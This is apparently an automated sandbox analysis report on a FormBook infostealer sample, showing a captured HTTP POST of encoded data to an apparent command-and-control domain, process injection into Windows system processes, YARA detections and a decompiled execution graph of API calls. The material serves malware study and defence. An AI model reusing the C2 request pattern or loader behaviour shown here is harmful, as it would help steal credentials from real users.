                                                                    Host: www.nonpressure.beauty
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 10301
                                                                    Connection: close
                                                                    Origin: http://www.nonpressure.beauty
                                                                    Referer: http://www.nonpressure.beauty/naci/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 57 79 4d 4f 39 45 6e 47 45 4b 48 51 36 4a 78 6c 42 78 33 2b 4f 4f 41 45 71 34 63 5a 4f 47 2b 49 6d 46 4c 54 69 55 67 73 35 56 35 58 59 43 6a 69 4d 42 33 55 64 6f 54 66 45 41 66 4c 67 48 47 59 36 4c 59 54 5a 68 59 38 44 65 78 37 43 49 41 78 4f 32 65 62 31 31 56 6e 6b 33 32 36 44 50 47 69 4f 53 6f 2b 31 4a 53 30 66 50 50 2f 63 39 6e 35 78 4d 4b 2f 54 53 70 71 47 7a 67 6b 73 76 4e 4f 56 6b 4b 67 54 33 64 70 6d 73 32 39 75 6b 56 70 70 66 7a 59 4c 6a 4e 2f 38 59 44 51 4e 6c 47 32 78 53 31 41 2f 45 64 56 4e 75 54 72 65 68 67 4d 63 65 61 4f 66 53 42 45 46 75 6a 57 32 31 31 4a 77 4a 74 49 7a 39 43 34 6e 35 35 77 4a 32 68 47 45 32 43 50 6f 72 37 77 57 56 4b 30 51 4c 78 71 2f 6c 74 75 66 53 77 72 33 34 74 4c 4e 57 37 46 44 63 6a 76 70 4c 64 2f 70 38 61 78 43 42 50 31 79 63 4f 44 56 66 5a 75 7a 63 38 72 61 56 66 78 32 4a 79 31 39 4b 53 48 68 33 68 4e 39 69 56 6c 57 62 61 2b 4a 6f 44 61 6a 2f 30 39 56 72 62 67 35 6e 79 59 65 6e 4c 35 79 53 57 63 32 38 75 52 4d 42 75 34 4d 77 51 53 32 59 4c 2b 68 [TRUNCATED]
                                                                    Data Ascii: C0oD=WyMO9EnGEKHQ6JxlBx3+OOAEq4cZOG+ImFLTiUgs5V5XYCjiMB3UdoTfEAfLgHGY6LYTZhY8Dex7CIAxO2eb11Vnk326DPGiOSo+1JS0fPP/c9n5xMK/TSpqGzgksvNOVkKgT3dpms29ukVppfzYLjN/8YDQNlG2xS1A/EdVNuTrehgMceaOfSBEFujW211JwJtIz9C4n55wJ2hGE2CPor7wWVK0QLxq/ltufSwr34tLNW7FDcjvpLd/p8axCBP1ycODVfZuzc8raVfx2Jy19KSHh3hN9iVlWba+JoDaj/09Vrbg5nyYenL5ySWc28uRMBu4MwQS2YL+hzafdRKa0Wl0zCYdf0BwWyOClVfV1ihb+4MNEwtdY4Gka+FsxhHLrzTUkvUbFYzt61l2Bcx2PsdS0TtnDPwSB/myDk7zcPdvaMrX5O7ltH85b2qMuJ3ermhzOKKzmbaRw6OTZrLLqGbutcr7bZk88Ig8E/EMgJPJVPx3nHEqs3Bpv9meSWIMvIiSNbYgiYKm71TMe/XjI4yiaLM/IRcOQ3N0NaZd1a87CAAspvP8D2xaZz4a686qIfLyN9OLSj0h7eAwSSF+bXfijLSoCLaEmFmZg2BRHJVdEt87rK6Oi+tj8uTZbcWOk8XcYQaG9iF3NNVot2uRBSlr+D5Fafz/cTGnJ35L0oQlVN54cFukRnbTQ+CtNskYAXMJIqpVkCupGI80WBNY5uvp47Hh1jEBlXsrLvv17SLtxvWI+QREFmsQ4UcYghB/vSiwhKI/QrbeVWUpt1lMJ0j1Uc2O6g3I7dUmeDTRuoq2lTuN09808gv/BShR6li4EQgbLsqjmHNOiF9JvsrNVu0FmK2BbCkoj7KWoCqzU5wNJpIWy1auZXssy60RpDXuPdBzM97dy4iVZOzFQxCYBofeM/4T1ePm5lZz1mDODK9rlvW90rTl4WKNiL2zRADDiX9NJC5OrvLhA+nOEiF7CUhrI9e/Y9iYkuTVli5EIrduXD1 [TRUNCATED]
                                                                    Nov 12, 2024 18:50:05.474466085 CET683INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:50:05 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                    Expires: Tue, 12 Nov 2024 17:50:05 GMT
                                                                    Vary: Accept-Encoding
                                                                    cf-cache-status: DYNAMIC
                                                                    Server: cloudflare
                                                                    CF-RAY: 8e185cc1ebe9e97a-DFW
                                                                    Content-Encoding: gzip
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1351&sent=5&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10917&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:12:46:58
                                                                    Start date:12/11/2024
                                                                    Path:C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe"
                                                                    Imagebase:0xd10000
                                                                    File size:1'600'512 bytes
                                                                    MD5 hash:0BB932F92B40EEC8D5BC5B595B948096
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:12:46:59
                                                                    Start date:12/11/2024
                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe"
                                                                    Imagebase:0xcc0000
                                                                    File size:46'504 bytes
                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2012145210.0000000005860000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2011124026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2011753567.0000000003B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:12:47:23
                                                                    Start date:12/11/2024
                                                                    Path:C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe"
                                                                    Imagebase:0xbb0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3546078918.0000000002AE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:6
                                                                    Start time:12:47:25
                                                                    Start date:12/11/2024
                                                                    Path:C:\Windows\SysWOW64\winver.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\winver.exe"
                                                                    Imagebase:0xf90000
                                                                    File size:57'344 bytes
                                                                    MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3546137914.0000000000F40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3545010767.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3546082583.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:7
                                                                    Start time:12:47:38
                                                                    Start date:12/11/2024
                                                                    Path:C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe"
                                                                    Imagebase:0xbb0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3547691925.0000000004ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:8
                                                                    Start time:12:47:50
                                                                    Start date:12/11/2024
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x800000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:2.9%
                                                                      Dynamic/Decrypted Code Coverage:1%
                                                                      Signature Coverage:4.1%
                                                                      Total number of Nodes:1697
                                                                      Total number of Limit Nodes:34
                                                                      execution_graph 90699 d14b81 90702 d14b9b 90699->90702 90703 d14bb2 90702->90703 90704 d14bb7 90703->90704 90705 d14c16 90703->90705 90746 d14c14 90703->90746 90706 d14c90 PostQuitMessage 90704->90706 90707 d14bc4 90704->90707 90709 d539dd 90705->90709 90710 d14c1c 90705->90710 90714 d14b95 90706->90714 90712 d53a5e 90707->90712 90713 d14bcf 90707->90713 90708 d14bfb DefWindowProcW 90708->90714 90751 d131ed 10 API calls 90709->90751 90715 d14c23 90710->90715 90716 d14c48 SetTimer RegisterWindowMessageW 90710->90716 90766 d7be4e 34 API calls ___scrt_fastfail 90712->90766 90720 d14bd9 90713->90720 90721 d53a4a 90713->90721 90717 d5397e 90715->90717 90718 d14c2c KillTimer 90715->90718 90716->90714 90722 d14c71 CreatePopupMenu 90716->90722 90730 d53983 90717->90730 90731 d539b9 MoveWindow 90717->90731 90747 d14b1d Shell_NotifyIconW ___scrt_fastfail 90718->90747 90719 d539fe 90752 d2e48c 42 API calls 90719->90752 90727 d14be4 90720->90727 90728 d53a2f 90720->90728 90765 d7c07f 27 API calls ___scrt_fastfail 90721->90765 90722->90714 90734 d14bef 90727->90734 90735 d14c7e 90727->90735 90728->90708 90764 d70a1b 22 API calls 90728->90764 90729 d53a70 90729->90708 90729->90714 90736 d53989 90730->90736 90737 d539a8 SetFocus 90730->90737 90731->90714 90732 d14c3f 90748 d15adb DeleteObject DestroyWindow 90732->90748 90733 d14c8e 90733->90714 90734->90708 90753 d14b1d Shell_NotifyIconW ___scrt_fastfail 90734->90753 90749 d14c9a 44 API calls ___scrt_fastfail 90735->90749 90736->90734 90741 d53992 90736->90741 90737->90714 90750 d131ed 10 API calls 90741->90750 90744 d53a23 90754 d156c2 90744->90754 90746->90708 90747->90732 90748->90714 90749->90733 90750->90714 90751->90719 90752->90734 90753->90744 90755 d156ed ___scrt_fastfail 90754->90755 90767 d16092 90755->90767 90759 d15773 90760 d15791 Shell_NotifyIconW 90759->90760 90761 d540bd Shell_NotifyIconW 90759->90761 90771 d157ae 90760->90771 90763 d157a7 90763->90746 90764->90746 90765->90733 90766->90729 90768 d15742 90767->90768 90769 d542db 90767->90769 90768->90759 90793 d7c792 42 API calls _strftime 90768->90793 90769->90768 90770 d542e4 DestroyIcon 90769->90770 90770->90768 90772 d157ca 90771->90772 90773 d1589e 90771->90773 90794 d17c18 90772->90794 90773->90763 90776 d157e5 90799 d184e7 90776->90799 90777 d540ca LoadStringW 90779 d540e4 90777->90779 90787 d1581f ___scrt_fastfail 90779->90787 90820 d1c1c3 90779->90820 90780 d157fa 90781 d54100 90780->90781 90782 d15807 90780->90782 90785 d17cf8 22 API calls 90781->90785 90782->90779 90784 d15811 90782->90784 90811 d17cf8 90784->90811 90788 d5410e 90785->90788 90790 d15884 Shell_NotifyIconW 90787->90790 90788->90787 90824 d152b7 90788->90824 90790->90773 90791 d54130 90792 d152b7 22 API calls 90791->90792 90792->90787 90793->90759 90833 d2fd8b 90794->90833 90796 d17c3d 90843 d2fd5b 90796->90843 90798 d157d8 90798->90776 90798->90777 90800 d55777 90799->90800 90801 d184f7 _wcslen 90799->90801 90869 d1ad22 90800->90869 90804 d18532 90801->90804 90805 d1850d 90801->90805 90803 d55780 90803->90803 90807 d2fd5b 22 API calls 90804->90807 90868 d188bb 22 API calls 90805->90868 90808 d1853e 90807->90808 90809 d2fd8b 22 API calls 90808->90809 90810 d18515 __fread_nolock 90809->90810 90810->90780 90812 d5563c 90811->90812 90813 d17d0a 90811->90813 90889 d709c0 22 API calls __fread_nolock 90812->90889 90879 d17d1b 90813->90879 90816 d17d16 90816->90787 90817 d55652 90818 d55646 90818->90817 90819 d1c1c3 22 API calls 90818->90819 90819->90817 90821 d1c1e6 __fread_nolock 90820->90821 90822 d1c1d7 90820->90822 90821->90787 90822->90821 90823 d2fd8b 22 API calls 90822->90823 90823->90821 90825 d53e1a 90824->90825 90826 d152ce 90824->90826 90828 d2fd5b 22 API calls 90825->90828 90895 d152df 90826->90895 90830 d53e24 _wcslen 90828->90830 90829 d152d9 90829->90791 90831 d2fd8b 22 API calls 90830->90831 90832 d53e5d __fread_nolock 90831->90832 90835 d2fd5b 90833->90835 90836 d2fd7a 90835->90836 90839 d2fd7c 90835->90839 90853 d3e99c 90835->90853 90860 d34e3d 7 API calls 2 library calls 90835->90860 90836->90796 90838 d305ed 90862 d33234 RaiseException 90838->90862 90839->90838 90861 d33234 RaiseException 90839->90861 90842 d3060a 90842->90796 90845 d2fd60 90843->90845 90844 d3e99c ___std_exception_copy 21 API calls 90844->90845 90845->90844 90846 d2fd7a 90845->90846 90848 d2fd7c 90845->90848 90865 d34e3d 7 API calls 2 library calls 90845->90865 90846->90798 90849 d305ed 90848->90849 90866 d33234 RaiseException 90848->90866 90867 d33234 RaiseException 90849->90867 90852 d3060a 90852->90798 90859 d437b0 __dosmaperr 90853->90859 90854 d437ee 90864 d3f269 20 API calls __dosmaperr 90854->90864 90855 d437d9 RtlAllocateHeap 90857 d437ec 90855->90857 90855->90859 90857->90835 90859->90854 90859->90855 90863 d34e3d 7 API calls 2 library calls 90859->90863 90860->90835 90861->90838 90862->90842 90863->90859 90864->90857 90865->90845 90866->90849 90867->90852 90868->90810 90870 d1ad39 __fread_nolock 90869->90870 90871 d1ad30 90869->90871 90870->90803 90871->90870 90873 d1c7c9 90871->90873 90874 d1c7dc 90873->90874 90878 d1c7d9 __fread_nolock 90873->90878 90875 d2fd5b 22 API calls 90874->90875 90876 d1c7e7 90875->90876 90877 d2fd8b 22 API calls 90876->90877 90877->90878 90878->90870 90880 d17d2a 90879->90880 90886 d17d5e __fread_nolock 90879->90886 90881 d5566d 90880->90881 90882 d17d51 90880->90882 90880->90886 90883 d2fd5b 22 API calls 90881->90883 90890 d1be83 90882->90890 90885 d5567c 90883->90885 90887 d2fd8b 22 API calls 90885->90887 90886->90816 90888 d556b0 __fread_nolock 90887->90888 90889->90818 90891 d1be99 90890->90891 90894 d1be94 __fread_nolock 90890->90894 90892 d2fd8b 22 API calls 90891->90892 90893 d603ea 90891->90893 90892->90894 90894->90886 90896 d152ef _wcslen 90895->90896 90897 d15302 90896->90897 90898 d53e7c 90896->90898 90899 d1be83 22 API calls 90897->90899 90900 d2fd5b 22 API calls 90898->90900 90901 d1530f __fread_nolock 90899->90901 90902 d53e86 90900->90902 90901->90829 90903 d2fd8b 22 API calls 90902->90903 90904 d53eb6 __fread_nolock 90903->90904 90905 d11033 90910 d16633 90905->90910 90909 d11042 90918 d1c25d 90910->90918 90915 d1673e 90916 d11038 90915->90916 90926 d16b97 22 API calls __fread_nolock 90915->90926 90917 d30023 29 API calls __onexit 90916->90917 90917->90909 90919 d2fd8b 22 API calls 90918->90919 90920 d1c272 90919->90920 90921 d2fd5b 22 API calls 90920->90921 90922 d166a1 90921->90922 90923 d1597b 90922->90923 90927 d159a7 90923->90927 90926->90915 90928 d1599a 90927->90928 90929 d159b4 90927->90929 90928->90915 90929->90928 90930 d159bb RegOpenKeyExW 90929->90930 90930->90928 90931 d159d5 RegQueryValueExW 90930->90931 90932 d159f6 90931->90932 90933 d15a0b RegCloseKey 90931->90933 90932->90933 90933->90928 90934 1236c20 90948 1234870 90934->90948 90936 1236cf4 90951 1236b10 90936->90951 90938 1236d1d CreateFileW 90940 1236d71 90938->90940 90941 1236d6c 90938->90941 90940->90941 90942 1236d88 VirtualAlloc 90940->90942 90942->90941 90943 1236da6 ReadFile 90942->90943 90943->90941 90944 1236dc1 90943->90944 90945 1235b10 13 API calls 90944->90945 90946 1236df4 90945->90946 90947 1236e17 ExitProcess 90946->90947 90947->90941 90950 1234efb 90948->90950 90954 1237d20 GetPEB 90948->90954 90950->90936 90952 1236b19 Sleep 90951->90952 90953 1236b27 90952->90953 90954->90950 90955 d1f7e5 90958 d1d010 90955->90958 90959 d1d02b 90958->90959 90960 d60cd3 90959->90960 90961 d60d21 90959->90961 90969 d1d050 90959->90969 90964 d60cdd 90960->90964 90967 d60cea 90960->90967 90960->90969 91000 d957c9 94 API calls 2 library calls 90961->91000 90998 d95c5a 94 API calls 90964->90998 90979 d1d320 90967->90979 90999 d960f7 94 API calls 2 library calls 90967->90999 90975 d1d34e 90969->90975 90976 d60efd 90969->90976 90969->90979 90983 d2dab2 40 API calls 90969->90983 90984 d1d4e0 40 API calls 90969->90984 90985 d1c1c3 22 API calls 90969->90985 90987 d1c117 90969->90987 90991 d2da6c 40 API calls 90969->90991 90992 d301c2 5 API calls __Init_thread_wait 90969->90992 90993 d113dc 22 API calls 90969->90993 90994 d30023 29 API calls __onexit 90969->90994 90995 d30178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 90969->90995 90996 d2ec9e 82 API calls 90969->90996 90997 d2e596 83 API calls 90969->90997 91001 d1c5e7 23 API calls ISource 90969->91001 91002 d6f5a8 23 API calls 90969->91002 90971 d60fb4 90971->90971 91003 d95b33 82 API calls 90976->91003 90979->90975 91004 d834ba 82 API calls __wsopen_s 90979->91004 90983->90969 90984->90969 90985->90969 90988 d1c122 90987->90988 90989 d1c151 90988->90989 91005 d1c28f 41 API calls 90988->91005 90989->90969 90991->90969 90992->90969 90993->90969 90994->90969 90995->90969 90996->90969 90997->90969 90998->90967 90999->90979 91000->90969 91001->90969 91002->90969 91003->90979 91004->90971 91005->90989 91006 d11044 91011 d129fe 91006->91011 91008 d1104a 91047 d30023 29 API calls __onexit 91008->91047 91010 d11054 91048 d12ca3 91011->91048 91015 d12a75 91016 d1c25d 22 API calls 91015->91016 91017 d12a7f 91016->91017 91018 d1c25d 22 API calls 91017->91018 91019 d12a89 91018->91019 91020 d1c25d 22 API calls 91019->91020 91021 d12a93 91020->91021 91022 d1c25d 22 API calls 91021->91022 91023 d12ad1 91022->91023 91024 d1c25d 22 API calls 91023->91024 91025 d12b9d 91024->91025 91058 d13027 91025->91058 91029 d12bcf 91030 d1c25d 22 API calls 91029->91030 91031 d12bd9 91030->91031 91079 d23220 91031->91079 91033 d12c04 91089 d133b6 91033->91089 91035 d12c20 91036 d12c30 GetStdHandle 91035->91036 91037 d53011 91036->91037 91038 d12c85 91036->91038 91037->91038 91039 d5301a 91037->91039 91042 d12c92 OleInitialize 91038->91042 91040 d2fd5b 22 API calls 91039->91040 91041 d53021 91040->91041 91096 d8003b InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 91041->91096 91042->91008 91044 d5302a 91097 d80862 CreateThread 91044->91097 91046 d53036 CloseHandle 91046->91038 91047->91010 91098 d12cfc 91048->91098 91051 d12cfc 22 API calls 91052 d12cdb 91051->91052 91053 d1c25d 22 API calls 91052->91053 91054 d12ce7 91053->91054 91055 d184e7 22 API calls 91054->91055 91056 d12a34 91055->91056 91057 d134ce 6 API calls 91056->91057 91057->91015 91059 d1c25d 22 API calls 91058->91059 91060 d13037 91059->91060 91061 d1c25d 22 API calls 91060->91061 91062 d1303f 91061->91062 91063 d1c25d 22 API calls 91062->91063 91064 d1305a 91063->91064 91065 d2fd5b 22 API calls 91064->91065 91066 d12ba7 91065->91066 91067 d13455 91066->91067 91068 d13463 91067->91068 91069 d1c25d 22 API calls 91068->91069 91070 d1346e 91069->91070 91071 d1c25d 22 API calls 91070->91071 91072 d13479 91071->91072 91073 d1c25d 22 API calls 91072->91073 91074 d13484 91073->91074 91075 d1c25d 22 API calls 91074->91075 91076 d1348f 91075->91076 91077 d2fd5b 22 API calls 91076->91077 91078 d134a1 RegisterWindowMessageW 91077->91078 91078->91029 91080 d23261 91079->91080 91086 d2323d 91079->91086 91105 d301c2 5 API calls __Init_thread_wait 91080->91105 91082 d2326b 91082->91086 91106 d30178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 91082->91106 91084 d2a007 91088 d2324e 91084->91088 91108 d30178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 91084->91108 91086->91088 91107 d301c2 5 API calls __Init_thread_wait 91086->91107 91088->91033 91090 d133c6 91089->91090 91091 d532b9 91089->91091 91093 d2fd5b 22 API calls 91090->91093 91109 d83127 23 API calls 91091->91109 91095 d133ce 91093->91095 91094 d532c4 91095->91035 91096->91044 91097->91046 91110 d80848 28 API calls 91097->91110 91099 d1c25d 22 API calls 91098->91099 91100 d12d07 91099->91100 91101 d1c25d 22 API calls 91100->91101 91102 d12d0f 91101->91102 91103 d1c25d 22 API calls 91102->91103 91104 d12cd1 91103->91104 91104->91051 91105->91082 91106->91086 91107->91084 91108->91088 91109->91094 91111 d483a2 91116 d4815e 91111->91116 91114 d483ca 91121 d4818f try_get_first_available_module 91116->91121 91118 d4838e 91135 d4277c 26 API calls __cftof 91118->91135 91120 d482e3 91120->91114 91128 d50925 91120->91128 91124 d482d8 91121->91124 91131 d38d9b 40 API calls 2 library calls 91121->91131 91123 d4832c 91123->91124 91132 d38d9b 40 API calls 2 library calls 91123->91132 91124->91120 91134 d3f269 20 API calls __dosmaperr 91124->91134 91126 d4834b 91126->91124 91133 d38d9b 40 API calls 2 library calls 91126->91133 91136 d50022 91128->91136 91130 d50940 91130->91114 91131->91123 91132->91126 91133->91124 91134->91118 91135->91120 91138 d5002e ___DestructExceptionObject 91136->91138 91137 d5003c 91193 d3f269 20 API calls __dosmaperr 91137->91193 91138->91137 91140 d50075 91138->91140 91147 d505fc 91140->91147 91141 d50041 91194 d4277c 26 API calls __cftof 91141->91194 91146 d5004b __wsopen_s 91146->91130 91148 d50619 91147->91148 91149 d50647 91148->91149 91150 d5062e 91148->91150 91196 d451b1 91149->91196 91210 d3f256 20 API calls __dosmaperr 91150->91210 91153 d50633 91211 d3f269 20 API calls __dosmaperr 91153->91211 91154 d5064c 91155 d50655 91154->91155 91156 d5066c 91154->91156 91212 d3f256 20 API calls __dosmaperr 91155->91212 91209 d5033b CreateFileW 91156->91209 91160 d5065a 91213 d3f269 20 API calls __dosmaperr 91160->91213 91161 d50099 91195 d500c2 LeaveCriticalSection __wsopen_s 91161->91195 91163 d50722 GetFileType 91165 d50774 91163->91165 91166 d5072d GetLastError 91163->91166 91164 d506f7 GetLastError 91215 d3f233 20 API calls __dosmaperr 91164->91215 91218 d450fa 21 API calls 2 library calls 91165->91218 91216 d3f233 20 API calls __dosmaperr 91166->91216 91168 d506a5 91168->91163 91168->91164 91214 d5033b CreateFileW 91168->91214 91170 d5073b CloseHandle 91170->91153 91172 d50764 91170->91172 91217 d3f269 20 API calls __dosmaperr 91172->91217 91174 d506ea 91174->91163 91174->91164 91176 d50795 91178 d507e1 91176->91178 91219 d5054c 72 API calls 3 library calls 91176->91219 91177 d50769 91177->91153 91183 d5080e 91178->91183 91220 d500ee 72 API calls 4 library calls 91178->91220 91181 d50807 91182 d5081f 91181->91182 91181->91183 91182->91161 91185 d5089d CloseHandle 91182->91185 91221 d4864e 91183->91221 91236 d5033b CreateFileW 91185->91236 91187 d508c8 91188 d508d2 GetLastError 91187->91188 91192 d508fe 91187->91192 91237 d3f233 20 API calls __dosmaperr 91188->91237 91190 d508de 91238 d452c3 21 API calls 2 library calls 91190->91238 91192->91161 91193->91141 91194->91146 91195->91146 91197 d451bd ___DestructExceptionObject 91196->91197 91239 d42eee EnterCriticalSection 91197->91239 91199 d451c4 91200 d451e9 91199->91200 91205 d45257 EnterCriticalSection 91199->91205 91207 d4520b 91199->91207 91243 d44f90 91200->91243 91203 d45234 __wsopen_s 91203->91154 91206 d45264 LeaveCriticalSection 91205->91206 91205->91207 91206->91199 91240 d452ba 91207->91240 91209->91168 91210->91153 91211->91161 91212->91160 91213->91153 91214->91174 91215->91153 91216->91170 91217->91177 91218->91176 91219->91178 91220->91181 91269 d45354 91221->91269 91223 d48664 91282 d452c3 21 API calls 2 library calls 91223->91282 91224 d4865e 91224->91223 91226 d45354 __wsopen_s 26 API calls 91224->91226 91235 d48696 91224->91235 91229 d4868d 91226->91229 91227 d45354 __wsopen_s 26 API calls 91230 d486a2 CloseHandle 91227->91230 91228 d486bc 91231 d486de 91228->91231 91283 d3f233 20 API calls __dosmaperr 91228->91283 91232 d45354 __wsopen_s 26 API calls 91229->91232 91230->91223 91233 d486ae GetLastError 91230->91233 91231->91161 91232->91235 91233->91223 91235->91223 91235->91227 91236->91187 91237->91190 91238->91192 91239->91199 91251 d42f36 LeaveCriticalSection 91240->91251 91242 d452c1 91242->91203 91252 d44c0d 91243->91252 91245 d44faf 91260 d42958 91245->91260 91248 d45001 91248->91207 91250 d450d7 EnterCriticalSection 91248->91250 91249 d44fa2 91249->91245 91259 d43395 11 API calls 2 library calls 91249->91259 91250->91207 91251->91242 91253 d44c1a __dosmaperr 91252->91253 91254 d44c5a 91253->91254 91255 d44c45 RtlAllocateHeap 91253->91255 91266 d34e3d 7 API calls 2 library calls 91253->91266 91267 d3f269 20 API calls __dosmaperr 91254->91267 91255->91253 91256 d44c58 91255->91256 91256->91249 91259->91249 91261 d4298c __dosmaperr 91260->91261 91262 d42963 RtlFreeHeap 91260->91262 91261->91248 91262->91261 91263 d42978 91262->91263 91268 d3f269 20 API calls __dosmaperr 91263->91268 91265 d4297e GetLastError 91265->91261 91266->91253 91267->91256 91268->91265 91270 d45361 91269->91270 91272 d45376 91269->91272 91284 d3f256 20 API calls __dosmaperr 91270->91284 91275 d4539b 91272->91275 91286 d3f256 20 API calls __dosmaperr 91272->91286 91274 d45366 91285 d3f269 20 API calls __dosmaperr 91274->91285 91275->91224 91276 d453a6 91287 d3f269 20 API calls __dosmaperr 91276->91287 91279 d4536e 91279->91224 91280 d453ae 91288 d4277c 26 API calls __cftof 91280->91288 91282->91228 91283->91231 91284->91274 91285->91279 91286->91276 91287->91280 91288->91279 91289 d3037b 91290 d30387 ___DestructExceptionObject 91289->91290 91319 d2fe31 91290->91319 91292 d3038e 91293 d304e1 91292->91293 91296 d303b8 91292->91296 91357 d307bf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 91293->91357 91295 d304e8 91358 d34de2 28 API calls _abort 91295->91358 91307 d303f7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 91296->91307 91330 d4240d 91296->91330 91298 d304ee 91359 d34d94 28 API calls _abort 91298->91359 91302 d304f6 91303 d303d7 91306 d3045e 91342 d1368b 91306->91342 91310 d30458 91307->91310 91353 d34daa 38 API calls 2 library calls 91307->91353 91338 d308d9 91310->91338 91313 d3047a 